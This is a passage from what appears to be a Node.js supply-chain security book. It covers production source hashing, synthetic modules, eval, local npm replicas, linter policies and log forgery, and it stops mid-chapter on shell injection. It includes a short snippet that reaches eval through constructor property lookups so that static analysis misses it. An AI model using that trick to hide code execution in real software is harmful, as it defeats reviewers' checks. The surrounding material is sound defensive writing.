 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

exports.doSomethingScaryButItsOkInTest = function() {
    throw new Error('test-utils.js: NOT PRODUCTION CODE');
};


================================================
FILE: chapter-2/experiments/webpack-compat/test.sh
================================================
echo <<LICENSE
// Copyright 2017 Google LLC
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
//     https://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
LICENSE

echo <<POLYGLOT
/*

This file is both a syntactically valid JS file and a bash file
so that we can test webpack in its minimal configuration.
In its minimal configuration, webpack tries to bundle this file.

You may run this file via

$ bash test.sh

The rest of this is visible to a shell interpreter but not when
webpack mysteriously decides to load this as a JavaScript file.
POLYGLOT

set -e

pushd "$(dirname "$0")"

echo Bundling
rm -f dist/bundle.js
./node_modules/.bin/webpack

echo
echo Running bundle
if node dist/bundle.js 2>&1 | grep -q 'Hello, World!'; then
    echo 'Ran ok'
else
    echo 'Failed to bundle dependency'
fi

echo
echo Looking for non production code
if grep -Hn 'NOT PRODUCTION CODE' dist/bundle.js; then
    echo 'Webpack bundled test code in its minimal configuration'
    false
fi

# */


================================================
FILE: chapter-2/experiments/webpack-compat/webpack.config.js
================================================
const path = require('path');

module.exports = {
    output: {
        path: path.resolve('./dist'),
        filename: 'bundle.js',
    },
    entry: path.resolve('./index.js')
};


================================================
FILE: chapter-2/source-contents.md
================================================
# Source Content Checks

The node runtime's module loader uses the `_compile` method to actually
turn file content into code thus:

```js
// Run the file contents in the correct scope or sandbox. Expose
// the correct helper variables (require, module, exports) to
// the file.
// Returns exception, if any.
Module.prototype._compile = function(content, filename) {
  content = internalModule.stripShebang(content);

  // create wrapper function
  var wrapper = Module.wrap(content);

  var compiledWrapper = vm.runInThisContext(wrapper, {
```

At the top of that method body, we can check that the content
is on a list of production sources.

The entire process looks like:

1.  Developer develops and tests their app iteratively as normal.
2.  The developer generates a list of production sources via the
    dynamic bundling scheme outlined earlier, a static tool like
    webpack, or some combination.
3.  The bundling tool generates a file with a cryptographic hash
    for each production source.
    We prefer hashing to checking paths for reasons that will become
    apparent later when we discuss `eval`.
4.  A deploy script copies the bundle and the hashes to a production server.
5.  The server startup script passes a flag to `node` or `npm start`
    telling the runtime where to look for the production source hashes.
6.  The runtime reads the hashes and combines it with any hashes necessary
    to whitelist any `node` internal JavaScript files that might load
    via `require`.
7.  When a call to `require(x)` reaches `Module.prototype.compile`
    it hashes `content` and checks that the hash is in the allowed set.
    If not, it logs that and, if not in report-only-mode,
    raises an exception.
8.  Normal log collecting and monitoring communicates failures
    to the development team.

This is similar to [Content-Security-Policy (CSP)][csp] but for
server-side code.  Like CSP, there is an intermediate step that might
be useful between no enforcement and full enforcement:
[report only mode][].

[CSP]: https://developers.google.com/web/fundamentals/security/csp/
[report only mode]: https://developers.google.com/web/fundamentals/security/csp/#report-only


================================================
FILE: chapter-2/synthetic-modules.md
================================================
# Statically eliminating `eval`

Pug provides a flexible API to load Pug templates from `.pug` files
that `eval`s the generated code ([code][pug-eval]),
and a command line interface for precompiling Pug files.

Let's ignore those and imagine ways to allow a Pug user to
compile a Pug template that makes the static nature apparent
even to an analysis which doesn't make assumptions about the
contents of `.pug` files.

```js
const pug = require('pug');

exports.myTemplate = pug.lang`
doctype html
html
  head
    ...`;
```

This code snippet uses a [tagged template literal][] to allow Pug
template code to appear inline in a JavaScript file.

Rather than loading a `.pug` file, we have declared it in JavaScript.

Imagine further that `pug.lang` runs the compiler, but instead of
using `new Function(...)` it uses some new module API

```js
require.synthesize(generatedCode)
```

which could manufacture a `Module` instance with the generated code and
install the module into the cache with the input hash as its filename.

When [bundling](bundling.md), we could dump the content of synthesized
modules, and, when the bundle loads in production, pre-populate
the module cache.  When the `pug.lang` implementation asks the
module loader to create a module with the content between
<code>&#96;...&#96;</code> it would find a resolved module ready but not
loaded.  If a module is already in the cache, `Module` skips the
additional content checks.

The Node runtime function, `makeRequireFunction`
([code][makeRequireFunction]), defines a `require` for each module
that loads modules with the current module as the parent.  That would
also have to define a module specific `require.synthesize` that does
something like:

```js
  function synthesize(content) {
    content = String(content);
    // Hashing gives us a stable identifier so that we can associate
    // code inlined during bundling with that loaded in production.
    const hash = crypto
        .createHash('sha512')
        .update(content, 'utf8')
        .digest();
    // A name that communicates the source while being
    // unambiguous with any actual file.
    const filename = '/dev/null/synthetic/' + hash;
    // We scope the identifier so that it is clear in
    // debugging trace that the module is synthetic and
    // to avoid leading existing tools to conclude that
    // it is available via registry.npmjs.org.
    const id = '@node-internal-synthetic/' + hash;
    const cache = Module._cache;
    let syntheticModule = cache[filename];
    if (syntheticModule) {
      // TODO: updateChildren(mod, syntheticModule, true);
    } else {
      cache[filename] = syntheticModule = new Module(id, mod);
      syntheticModule.loaded = true;
      syntheticModule._compile(content, filename);
    }
    // TODO: dump the module if the command line flags specify
    // a synthetic_node_modules/ output directory.
    return syntheticModule;
  }

  require.synthesize = synthesize;
```

Static analysis tools often benefit from having a whole program
available.  Humans can reason about external files, like `.pug` files,
but static analysis tools often have to be unsound, or assume the
worst.  Synthetic modules may provide a way to move a large chunk of
previously unanalyzable code into the domain of what static analysis
tools can check.

This scheme, might be more discoverable if code generator authors
adopted some conventions:

*  If a module defines `exports.lang` it should be usable as a
   template tag.
*  If that same function is called with an option map instead
   of as a template tag function, then it should return a function
   to enable usages like
   ```js
   pug.lang(myPugOptionMap)`
     doctype html
     ...`
   ```
*  If the first line starts with some whitespace, all subsequent
   lines have that same whitespace as a prefix, and the language
   is whitespace-sensitive, then strip it before processing.
   This would allow indenting inline DSLs within a larger
   JavaScript program.

We discuss template tag usability concerns in more detail later when
discussing [library tweaks][library].

This proposal has one major drawback: we still have to trust the code
generator.  Pug's code generator looks well structured, but reasoning
about all the code produced by a code generator is harder than
reasoning about one hand-written module.  The [frozen realms][] proposal
restricts code to a provided API like
`vm.runInNewContext` aimed to.  If Pug, for example, chose to load its
code in a sandbox, then checking just the provided context would give
us confidence about what generated code could do.  In some cases, we
might be able to move code generator outside the
[*trusted computing base*][TCB].

[tagged template literal]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals#Tagged_template_literals
[pug-eval]: https://github.com/pugjs/pug/blob/926f7c720112cac76cfedb003e25e9f43d3a1767/packages/pug/lib/index.js#L261-L263
[library]: ../chapter-7/libraries.md
[makeRequireFunction]: https://github.com/nodejs/node/blob/8f5040771475ca5435b6cb78ab2ebce7447afcc1/lib/internal/module.js#L5
[frozen realms]: https://github.com/tc39/proposal-frozen-realms
[TCB]: https://en.wikipedia.org/wiki/Trusted_computing_base


================================================
FILE: chapter-2/what-about-eval.md
================================================
# What about `eval`?

Previously we've talked about how to control what code loads
from the file system, but not what code loads from strings.

The rest of this discussion uses the term "`eval`" to refer to any of
the `eval` operator, the `eval` function, `new Function`,
`vm.runIn*Context`, `vm.Script.run*`, [`WebAssembly.compile`][]
and other operators that convert strings or bytes into code.

Recall that it is difficult to prove that code
[does not `eval`](../chapter-1/threat-RCE.md):

```js
var x = {},
    a = 'constructor',
    b = 'constructor',
    s = 'console.log(s)';
x[a][b](s)();
```

Some node projects deploy with a tweaked node runtime that turns off
some `eval` operators, but there are widely used npm modules that use
them carefully.  For example:

*  [Pug][]  generates HTML from templates.
*  [Mathjs][] evaluates closed-form mathematical expressions.

Both generate JavaScript code under the hood, which is dynamically
parsed.  Let's consider two use cases:

*  Pug's code generator is usually called with trusted inputs, e.g.
   `.pug` files authored by trusted developers.
*  Mathjs is often called with untrusted inputs.  If a developer
   wanted to let a user generate an ad-hoc report without having to
   download data into a spreadsheet, they might use Mathjs to parse
   user-supplied arithmetic expressions ([docs][more_secure_eval])
   instead of trying to check that an input is safe to `eval` via
   `RegExp`s.  It is not without risk ([advisory][adv552])
   though [^1].

These two uses of code generators fall at either end of a spectrum.
The uses of Pug seem static, all the information is available before
we deploy.  Our Mathjs use case is necessarily dynamic since the
input is not available until a user is in the loop.

Next we discuss ways to recognize and simplify the former, while
double-checking the latter.  On the client, we have no options between
allowing implicit `eval` and banning all uses of `eval`.  There are
fewer compelling use cases on the client since it is harder to
amortize code generation over multiple requests.  On the server, use
of `eval` in the presence of untrusted inputs still needs to be
carefully vetted.  We explore ways to programatically enforce vetting
decisions short of a blanket ban, but turning off `eval` before
accepting untrusted inputs is still the most reliable way to prevent
attackers from using `eval` against you.

[^1]: Since this writing, [Mathjs got rid of all uses of `eval`][no-eval-issue]


[`WebAssembly.compile`]: http://webassembly.org/docs/js/#webassemblycompile
[Pug]: https://pugjs.org/
[Mathjs]: http://mathjs.org/
[more_secure_eval]: http://mathjs.org/examples/advanced/more_secure_eval.js.html
[adv552]: https://nodesecurity.io/advisories/552
[no-eval-issue]: https://github.com/josdejong/mathjs/issues/1019#issuecomment-367289278


================================================
FILE: chapter-3/knowing_dependencies.md
================================================
# Knowing your dependencies

## Background

[`npmjs` search results][npmjs/node] have stats on download count and
open issues and PRs.

<img alt="npmjs.com stats for module node" src="../images/npmjs-node.png" height="399" width="230">

Each package page also links to the corresponding GitHub project
which has links to the project's [pulse][github-pulse].

Both of these give an idea of how popular the project is, and
whether it's actively developed.

On their Github pages, many projects proudly display
[badges and shields][] indicating their continuous integration status,
and other vital statistics.

The Linux Core Infrastructure project espouses a set of
[best practices badges][bpb] and define tiers for mature infrastructure
projects.  We get some of the basic items for free by distributing via
`npm`, but other items bear on how responsive the project might be to
vulnerability reports and how it might respond to attempts to inject
malicious code:

*  Another will have the necessary access rights if someone dies
*  Monitor external dependencies to detect/fix known vulnerabilities
*  At least 2 unassociated significant contributors
*  Use 2FA
*  At least 50% of all modifications are reviewed by another
*  Have a security review (internal or external)

"Use 2FA" is possible with npm but it is not clear that it is widely
practiced.  [MTP][] discusses the support already built into Github
and `npm profile`.


## Problem

Threats: [LQC][] [MTP][]

The npm repository, like other open-source code repositories,
contains mature and well-maintained modules, but also plenty of
bleeding-edge code that has not yet had bugs ironed out.

A wise technical lead might decide that they can use third-party
dependencies that have been widely used in production for several
years by projects with similar needs since gross errors are likely
to have been fixed.

That technical lead might also decide that they can use bleeding edge
code when they have enough local expertise to vet it, identify
corner-cases they need to check, and fix any gross errors they
encounter.

Either way, that decision to use bleeding-edge code or code that might
not be maintained over the long term should be a conscious one.


## Success Criteria

Development teams are rarely surprised when code that they had built a
prototype on later turns out not to be ready for production use, and
they do not have to pore over others' code to vet many dependencies.

## A Possible Solution

The building blocks of a solution probably already exist.

### Aggregate more signals

`npmjs.com` may or may not be the right place to do this, but we
should, as a community, aggregate signals about modules and make
them readily available.

`npmjs.com/package` already aggregates some useful signals, but
it or another forum could aggregate more including

-  More of the GitHub pulse information including
   closed issues, PRs over time.
-  Relevant badges & shields for the project itself.
-  Relevant badges & shields by percentage of transitive
   dependencies and peer dependencies that have them.
-  Support channels, e.g. slack & discord.
-  Vulnerability reports and the version they affect.
   See sources in ["When all else fails"][failing]
-  Weighted mean of age of production dependencies transitively.
-  Results of linters (see [oversight][]) run without respecting
   [inline ignore comments][eslint-ignore-line] and
   [file ignore directives][eslint-ignore-file].

Users deciding whether to buy something from an online store or
download a cellphone app from an app store have reviews
and comments from other users.  That members of the community take
time to weigh in can be a useful signal, and the details can help
clarify whether this module or an alternative might be better for a
specific use.

Large organizations who host [internal replicas][] may already have a
lot of the opinion available internally, but aggregating that across
clients can help smaller organizations and large organizations
that are debating whether to dip their toe in.


### Leadership & Developer outreach

The node runtime already [passes][CI-node] the Linux Foundation's best
practices criteria, but could lead the way by explaining how a project
that pushes from GitHub to `registry.npmjs.org` can pass more of these
criteria.


[npmjs/node]: https://www.npmjs.com/package/node
[github-pulse]: https://github.com/blog/1476-get-up-to-speed-with-pulse
[badges and shields]: https://github.com/badges/shields
[bpb]: https://github.com/coreinfrastructure/best-practices-badge
[internal replicas]: ../chapter-4/close_dependencies.md
[failing]: ../chapter-6/failing.md
[CRY]: ../chapter-1/threat-CRY.md
[LQC]: ../chapter-1/threat-LQC.md
[MTP]: ../chapter-1/threat-MTP.md
[oversight]: ../chapter-5/oversight.md
[eslint-ignore-line]: https://eslint.org/docs/user-guide/configuring#disabling-rules-with-inline-comments
[eslint-ignore-file]: https://eslint.org/docs/user-guide/configuring#ignoring-files-and-directories
[CI-node]: https://bestpractices.coreinfrastructure.org/projects?gteq=50&q=Node.js


================================================
FILE: chapter-4/close_dependencies.md
================================================
# Keeping your dependencies close

## Background

When deploying an application or service, many projects run `npm
install` which can cause problems.  [James Shore][] discusses the
problem and several solutions, none of which are ideal.

*  Network trouble reaching `registry.npmjs.org` becomes a single
   point of failure.
*  An extra `npm shrinkwrap` step is necessary to ensure that
   the versions used during testing are the same as the versions
   deployed (Shore's analysis predates [package locks][]), or
*  Developers check `node_modules` into revision control which
   may include architecture-specific binaries.
*  Local changes may be silently lost when re-installed on a dev
   machine or on upgrade.

Many organizations use tools to manage a local replica.

*  [npm Enterprise][] is a full-featured single-tenant implementation
   of the npm registry and website, created by npm, Inc.
*  npm can be [configured to use a different registry][] by setting
   the `registry` npm configuration option.  Once dependencies have
   been cached locally the first time, the `--offline` npm option will
   prevent fetching anything new from the network.
*  [Artifactory][] is a language agnostic dependency manager that
   supports Node.
*  [Sinopia][] is a Node specific repository server.
*  [Verdaccio][] is fork of Sinopia.
*  [Yarn][] is a package manager backed by the same
   <https://registry.npmjs.org> but which can be pointed at an
   [offline mirror][].  The offline mirror can have multiple tarballs
   per module to deal with architecture specific builds.  Its
   `--offline` mode prevents falling back to central, though does not
   prevent network fetches by module scripts.

Node's security working group has a [process][security-wg process] for
managing vulnerabilities in third-party code.

## Problem

Threats: [0DY][] [MTP][]

Security teams needs to match vulnerability reports with projects that
use affected modules so that they can respond to [zero days][0DY].
Centralizing module installation allows them to figure out whether a
report affects a module.

Large organizations with dedicated security specialists need to be
able to locally patch security issues or critical bugs and push to
production without waiting for upstream to push a new version.  When
someone in the organization discovers a vulnerability in a third-party
module, they should disclose it to the third-party maintainer, but
they should not wait before protecting end users who would be at risk
if an attacker independently discovered the same vulnerability.

## Success Criteria

We can have a reliable pipeline from the central repository,
through local repositories and to deployed services if:

*  A failure in `registry.npmjs.org` does not lead to compromise or
   denial of service by `npm install` during deployment, and/or
*  `npm install` is not necessary for deployment.

and

*  access to `registry.npmjs.org` is not necessary to publish
   a patch to an open source module as seen within an
   organization.

and

*  installing or deploying a module locally cannot abuse publish
   privileges, and/or
*  an organization can limit its exposure to compromise of
   `registry.npmjs.org`, and ideally vice-versa.

and

*  installation scripts only affect `node_modules` so cannot
   compromise local repositories, abuse commit privileges,
   or plant [trojans][trojan].


## Existing solutions

Having a local replica simplifies deploying targeted patches to
affected projects.  When responding, security specialists might
develop a patch before upstream.  They may be able to take into
account how their products use the module to produce a targeted patch
faster than upstream maintainers who have greater or
less-well-understood backwards compatibility constraints.

Keeping a local replica narrows the window for [MTP][] attacks.
Someone trying to inject malicious code has to have it up and
available from `registry.npmjs.org` at the time the install script
pulls it down which is hard for an attacker to predict.  There is a
monoculture tradeoff &mdash; having a smaller number of versions
across all projects increases the potential reach of such an attack
once successfully executed.  Centralized monitoring and reporting
tilts in the defenders' favor though.


## Incident Response

There is one piece that isn't provided directly by the local replica
providers aboce; security responders need a way to relate
vulnerability reports to affected projects when a [zero day][0DY]
clock starts ticking so they can figure out whom to notify.

*  If an organization shares revision control across all projects, then
   responders can find all `package.json`s and use git commit logs to
   identify likely points of contact.  Much of this is scriptable.
*  If an organization archives all production bundles before deployment,
   then tools can similarly scan archived bundles for `package.json`.
*  If an organization has an up-to-date database of projects with
   up-to-date links to revision control systems, then security teams
   may be able to automate scanning as above.
   Some managers like to have "skunkworks" projects that they keep
   out of project databases.
   Managers should be free to use codenames, but security teams need
   to ensure that "unlisted" doesn't mean "not supportable by
   incident response."
*  If none of the above work, security teams will need to maintain a
   database so that they have it when they need it.
   If the local replica is on a shared file system mount, then access
   logs may be sufficient.  If not, instrumenting `yarn`, may be the
   only option.

## Managing a Local Replica

If you don't have access to a commercial solution, some tooling can
make it easier to transition to and maintain a local replica.
We assume `yarn` below, but there are free versions of others which
may do some of this out of the box.

*  Developers' muscle memory may cause them to invoke `npm` instead of
   `yarn` so on a developer machine `$(which npm)` run in an
   [interactive shell][] should halt and remind the developer to use
   `yarn` instead.  Presubmit checks should scan scripts for
   invocations of `npm` to remind developers to use `yarn`.  It may be
   possible to use a project specific `.npmrc` with flags that cause
   it to dry-run or dump usage and exit, but this would affect
   non-interactive scripts so tread carefully.
*  A script can aid installing new modules into the local replica.
   It should:

   1. Run `yarn install --ignore-scripts` to fetch the module content
      into a revision controlled repository
   2. Build the module tarballs.  (See below)
   3. Check the revision controlled portion and any organization-specific
      metadata into revision control
   4. File a tracking issue for review of the new module, so that
      code quality checks can happen in parallel with the developers
      test-driving the module and figuring out whether it really
      solves their problem.
   5. Optionally, `yarn add`s the module to the developer's `package.json`.
*  Developers shouldn't have direct write access to the local replica
   so that malicious code running on a single developer's workstation
   cannot compromise other developers via the local replica.

Finally, all Node.js projects need to have a symlink to the
organization's `.yarnrc` at their root that points to the local
replica.

## Running install script safely

Running `{pre-,,post-}install` scripts without developer privileges
prevents malicious code (see [MTP][]) from:

*  Modifying code in a local repository.
*  Committing code as the developer possibly signing commits
   with keys available to `ssh-agent`.
*  Adding scripts to directories on a developer's `$PATH`.
*  Abusing `npm login` or [`yarn login`][] credentials.

Ideally one would run these on a separate sandboxed machine.
Many organizations have access to banks of machines that
test client-side JavaScript apps by running instrumented
browsers and include Windows boxes for testing IE, and
MacOS boxes for testing Safari.  These banks might also
run install scripts without any developer privileges and
with an airgap between the install scripts and source code
files.

If that doesn't work, running install scripts via `sudo -u `*guest*
where *guest* is a low-privilege account makes it harder for the
install script to piggyback on the developer's private keys.

## Proposed Solutions

A local replica manager should make it easy to:

*  Locally cache npm packages so that an interruption in service by
   `registry.npmjs` doesn't affect the ability to deploy a security
   update to existing products.
*  Cherrypick versions from `registry.npmjs` so that reviewers can
   exercise oversight, and remove versions with known,
   security-relevant regressions.
*  Publish one's own local patches to packages in the global
   namespace, so that incident responders can workaround zero-days
   without waiting for upstream.
*  Associate organization specific metadata with packages and versions
   so that the organization can aggregate lessons learned about
   specific dependencies.
*  Cross-compile binaries so that developers do not have to run
   installation scripts on their own machines.

The local repository providers mentioned above address many of these,
but we have not comprehensively evalated any of them.

Cherrypicking a version should not require using a tool other than
`npm` or `yarn`.  Cherrypicking a version when `npm` communicates
directly with `registry.npmjs` should be a no-op, so the `npm`
interface could support cherrypicking.

Existing tools do not prevent abuse of developer privileges by install
scripts.  The first tool to do so should be preferred by security
conscious organizations.

Ideally `npm` and `yarn` would be configurable so that they could
delegate running installation script to a local replica manager.  We
would like to see local replica managers compete on their ability to
do so securely.  We realize that this is no small change, but abuse of
developer privileges can directly affect source base integrity.

If an `npm` configuration could opt into sending the project name from
`package.json` then local replica managers could make it easier for
incident responders to find projects affected by a security alert for
a specific module.


[James Shore]: https://www.letscodejavascript.com/v3/blog/2014/03/the_npm_debacle
[package locks]: https://docs.npmjs.com/files/package-lock.json
[npm Enterprise]: https://www.npmjs.com/enterprise
[configured to use a different registry]: https://docs.npmjs.com/misc/config
[Artifactory]: https://www.jfrog.com/confluence/display/RTF/Npm+Registry#NpmRegistry-AdvancedConfiguration
[Sinopia]: https://www.npmjs.com/package/sinopia#override-public-packages
[Verdaccio]: https://github.com/verdaccio/verdaccio/blob/66b2175584e29587be0fd7979ea9f9c73b08b8e9/docs/use-cases.md#override-public-packages
[yarn]: https://github.com/yarnpkg/yarn
[security-wg process]: https://github.com/nodejs/security-wg/blob/master/processes/third_party_vuln_process.md
[0DY]: ../chapter-1/threat-0DY.md
[MTP]: ../chapter-1/threat-MTP.md
[offline mirror]: https://yarnpkg.com/blog/2016/11/24/offline-mirror/
[interactive shell]: http://www.tldp.org/LDP/abs/html/intandnonint.html#IITEST
[CVE-IDs]: https://en.wikipedia.org/wiki/Common_Vulnerabilities_and_Exposures#CVE_identifiers
[saccone]: https://www.kb.cert.org/CERT_WEB/services/vul-notes.nsf/6eacfaeab94596f5852569290066a50b/018dbb99def6980185257f820013f175/$FILE/npmwormdisclosure.pdf
[`yarn login`]: https://yarnpkg.com/en/docs/cli/login
[trojan]: https://en.wikipedia.org/wiki/Trojan_horse_(computing)


================================================
FILE: chapter-5/oversight.md
================================================
# Oversight


## Problem

Threats: [BOF][] [CRY][] [DEX][] [EXF][] [LQC][] [QUI][] [RCE][] [SHP][]

Manually reviewing third party modules for known security problems
is time consuming.

Having developers wait for such review unnecessarily slows down
development.

Our engineering processes ought not force us to choose between
forgoing sanity checks and shipping code in a timely manner.


## Background

[JSConformance][] allows a project team to specify a policy for
Closure JavaScript.  This policy can encode lessons learned about APIs
that are prone to misuse.  By taking into account type information
about arguments and `this`-values it can distinguish problematic
patterns like `setTimeout(aString, dt)` from unproblematic ones
`setTimeout(aFunction, dt)`.

[TSLint][tslint] and [ESLint][eslint] both allow custom rules so can
be extended as a project or developer community identifies Good and
Bad parts of JavaScript for their particular context.


## A possible solution

### Encode lessons learned by the community in linter policies

Instead of having security specialists reviewing lots of code
they should focus on improving tools.
Some APIs and idioms are more prone to misuse than others, and some
should be deprecated in favor of more robust ways of expressing the
same idea.  As the community reaches a rough consensus that a code
pattern is prone to misuse or there is a more robust alternative, we
could try to encode that knowledge in an automatable policy.

Linters are not perfect.  There are no sound production-quality static
type systems for JavaScript, so its linters are also necessarily
heuristic.  TSLint typically has more fine-grained type information
available than ESLint, so there are probably more anti-patterns that
TSLint can identify with an acceptable false-positive rate than
ESLint, but feedback about what can and can't be expressed in ESLint
might give its maintainers useful feedback.

Linters can reduce the burden on reviewers by enabling computer aided
code review &mdash; helping reviewers focus on areas that use powerful
APIs, and giving a sense of the kinds of problems to look out for.

They can also give developers a sense of how controversial a review
might be, and guide them in asking the right kinds of questions.

Custom policies can also help educate developers about alternatives.

The rule below specifies an anti-pattern for client-side JavaScript
in machine-checkable form, assigns it a name, has a short summary that
can appear in an error message, and a longer description or
documentation URL that explains the reasoning behind the rule.

It also documents a number of known exceptions to the rule, for
example, APIs that wrap `document.write` to do additional checks.

```pb
requirement: {
  rule_id: 'closure:documentWrite'
  type: BANNED_PROPERTY
  error_message: 'Using Document.prototype.write is not allowed. '
      'Use goog.dom.safe.documentWrite instead.'
      ''
      'Any content passed to write() will be automatically '
      'evaluated in the DOM and therefore the assignment of '
      'user-controlled, insufficiently sanitized or escaped '
      'content can result in XSS vulnerabilities.'
      ''
      'Document.prototype.write is bad for performance as it '
      'forces document reparsing, has unpredictable semantics '
      'and disallows many optimizations a browser may make. '
      'It is almost never needed.'
      ''
      'Exceptions allowed for:'
      '* writing to a completely new window such as a popup '
      '  or an iframe.'
      '* frame busting.'
      ''
      'If you need to use it, use the type-safe '
      'goog.dom.safe.documentWrite wrapper, or directly '
      'render a Strict Soy template using '
      'goog.soy.Renderer.prototype.renderElement (or similar).'

  value: 'Document.prototype.write'
  value: 'Document.prototype.writeln'

  # These uses have been determined to be safe by manual review.
  whitelist: 'javascript/closure/async/nexttick.js'
  whitelist: 'javascript/closure/base.js'
  whitelist: 'javascript/closure/dom/safe.js'
}
```

----

We propose a project that maintains a set of linter policies per language:

*  A **common** policy suitable for all projects that identifies
   anti-patterns that are generally regarded as bad practice by the
   community with a low false positive rate.
*  A **strict** policy suitable for projects that are willing to
   deal with some false positives in exchange for identifying more
   potential problems.
*  An **experimental** policy that projects that want to contribute to
   linter policy development can use.
   New rules go here first, so that rule maintainers can get feedback
   about their impact on real code.


### Decouple Reviews from Development

Within a large organization, there are often multiple review cycles, some
concurrent:

-  Reviews of designs and use cases where developers gather information
   from others.
-  Code reviewers critique pull requests for correctness, maintainability,
   testability.
-  Release candidate reviews where professional testers examine a
   partial system and try to break it.
-  Pre-launch reviews where legal, security & privacy, and other
   concerned parties come to understand the state of the system and
   weigh in on what they need to be able to support its deployment.
-  Limited releases where trusted users get to use an application.

Reviews should happen early and late.  When designing a system or a
new feature, technical leads should engage specialists.  Before
shipping, they should circle back to double check the implementation.
During rapid development though, developers should drive development
&mdash; they may ask questions, and may receive feedback (solicited
and not), but ought not have to halt work while they wait for reviews
from specialists.

Some changes have a higher security impact than other, so
some will require review by security specialists, but not most.

During an ongoing security review, security specialists can contribute
use cases and test cases; file issues; and help to integrate tools
like linters, fuzzers, and vulnerability scanners.

As described in "[Keeping your dependencies close][]", new third-party
modules are of particular interest to security specialists, but
shouldn't require security review before developers use them on an
experimental basis.

There are a many workflows that allows people to work independently
and later circle back so that nothing falls through the cracks.
Below is one that has worked in similar contexts:

1. The developer (or the automated import script) files a
   tracking issue that is a prerequisite for pre-launch review.
2. If the developer later finds out that they don't plan on using
   the unreviewed module, they can close the tracking issue.
3. The assigned security specialist asks follow-up questions and
   reports their findings via the tracking issue.
4. A common pre-launch script checks queries a module metadata
   databased maintained by security to identify still-unvetted
   dependencies.

[BOF]: ../chapter-1/threat-BOF.md
[CRY]: ../chapter-1/threat-CRY.md
[DEX]: ../chapter-1/threat-DEX.md
[EXF]: ../chapter-1/threat-EXF.md
[LQC]: ../chapter-1/threat-LQC.md
[RCE]: ../chapter-1/threat-RCE.md
[SHP]: ../chapter-1/threat-SHP.md
[QUI]: ../chapter-1/threat-QUI.md
[JSConformance]: https://github.com/google/closure-compiler/wiki/JS-Conformance-Framework
[tslint]: https://palantir.github.io/tslint/develop/custom-rules/
[eslint]: https://eslint.org/docs/developer-guide/working-with-rules-new#runtime-rules
[Keeping your dependencies close]: ../chapter-4/close_dependencies.md


================================================
FILE: chapter-6/failing.md
================================================
# When all else fails

## Background

The ["Incident Handlers Handbook"][SANS] discusses at length how to
respond to security breaches, but the main takeaways are:

*  You need to do work before incidents happen to be able to
   respond effectively.
*  Similar measures can lower the rate of incidents.
*  You will still have incidents.
*  Being in a position to respond effectively can limit damage when
   incidents occur.

Node's proposed [security working group][security-wg]
includes in its charter measures to route information about
vulnerabilities and fixes to the right places, and coordinate response
and disclosure.

Package monitoring services like [nodesecurity], GitHub's
[package graph][github graph], [snyk][], and the
[nodejs-sec list][nodejs-sec] aim to help vulnerability reports get to
those who need them.


## Problem

Threats: [0DY][]

Node's security working group is working on a lot of preparedness
issues so we only address a few.

### Naming is hard

Each of the groups mentioned above is doing great work trying to help
patches get to those who need them.  Each seems to be rolling their own
naming scheme for vulnerabilities.

The computer security community has a
[centralized naming scheme][CVE-IDs] for vulnerability reports so that
reports don't fall through the cracks.  Security responders rarely
have the luxury of dealing with a single stack much less a single
layer of that stack so mailing lists are not sufficient &mdash; if
reporters roll their own naming scheme or only disclose via
unstructured text, reports will fall through the cracks.

### Logging

When trying to diagnose a problem, responders often look to log files.
There has been much written on how to protect logs from
[forgery][log injection].

```js
console.log(s);
```

on a stack node runtime allows an attacker who controls `s` to write
any content to a log.

```js
console.log('MyModule: ' + s);
```

is a bit better.  An attacker has to insert a newline character into
`s` to forge another modules log prefix, and can't get rid of the
previous one.


## Success Criteria

Incident responders would have the tools necessary to do their jobs if

*  Security specialists can subscribe to a stream of notifications
   that include the vast majority of actionable security disclosures.
*  Responders can narrow down which code generated which log entries.


## Possible solutions

### Naming

Use CVE-IDs if at all possible when disclosing a vulnerability.  There
is a CNA for Node.js but that doesn't cover non-core npm modules and
other CNAs cover runtime dependencies like OpenSSL.  If there is no
other CNA that is appropriate, MITRE will issue an ID.

### Logging

On module load, the builtin `module.js` creates a new version of
`require` for each module so that it can make sure that the module path
gets passed as the module parent parameter.

The same mechanism could create a distinct `console` logger for each
module that narrows down the source of a message, and makes it
unambiguous where one message ends and the next starts.  For example:

1. Replace all `/\r\n?/g` in the log message text with `'\n'`
   and emit a CRLF after the log message to prevent forgery by
   line splitting.
2. Prefix it with the module filename and a colon.

With this, an incident responder reading a log message can reliably
tell that the module mentioned is where the log message originated, as
long as the attacker didn't get write access to the log file.
Preventing log deletion by other processes is better handled by
Linux's `FS_APPEND_FL` and similar mechanisms than in node.

[nodesecurity]: https://nodesecurity.io/advisories
[github graph]: https://github.com/blog/2447-a-more-connected-universe
[snyk]: https://snyk.io/vuln?packageManager=npm
[nodejs-sec]: https://groups.google.com/group/nodejs-sec
[CVE-IDs]: https://en.wikipedia.org/wiki/Common_Vulnerabilities_and_Exposures#CVE_identifiers
[log injection]: https://www.owasp.org/index.php/Log_Injection
[0DY]: ../chapter-1/threats.md
[SANS]: https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-handbook-33901
[security-wg]: https://github.com/nodejs/security-wg


================================================
FILE: chapter-7/child-processes.md
================================================
# Shell injection

Threats: [SHP][]

The [`shelljs` module][shelljs] allows access to the system
shell.  We focus on `shelljs`, but similar arguments apply to builtins
like `child_process.spawn(cmd, { shell: ... })` ([docs][cp.spawn]) and
similar modules.

`shelljs` has some nice programmatic APIs for common shell commands
that escape arguments.

It also provides `shell.exec` which allows full access to the shell
including interpretation of shell meta characters.

Solving [shell injection][SHP] is a much harder problem than query
injection since shell scripts tend to call other shell scripts, so
properly escaping arguments to one script doesn't help if the script
sloppily composes a sub-shell.  The problem of tools that trust their
inputs is not limited to shell scripts: see discussion of image decoders
in [BOF][].

The [shell grammar][] has more layers of interpretation so is arguably
more complex than any one SQL grammar.

We can do much better than string concatenation though.  The code
below is vulnerable.

```js
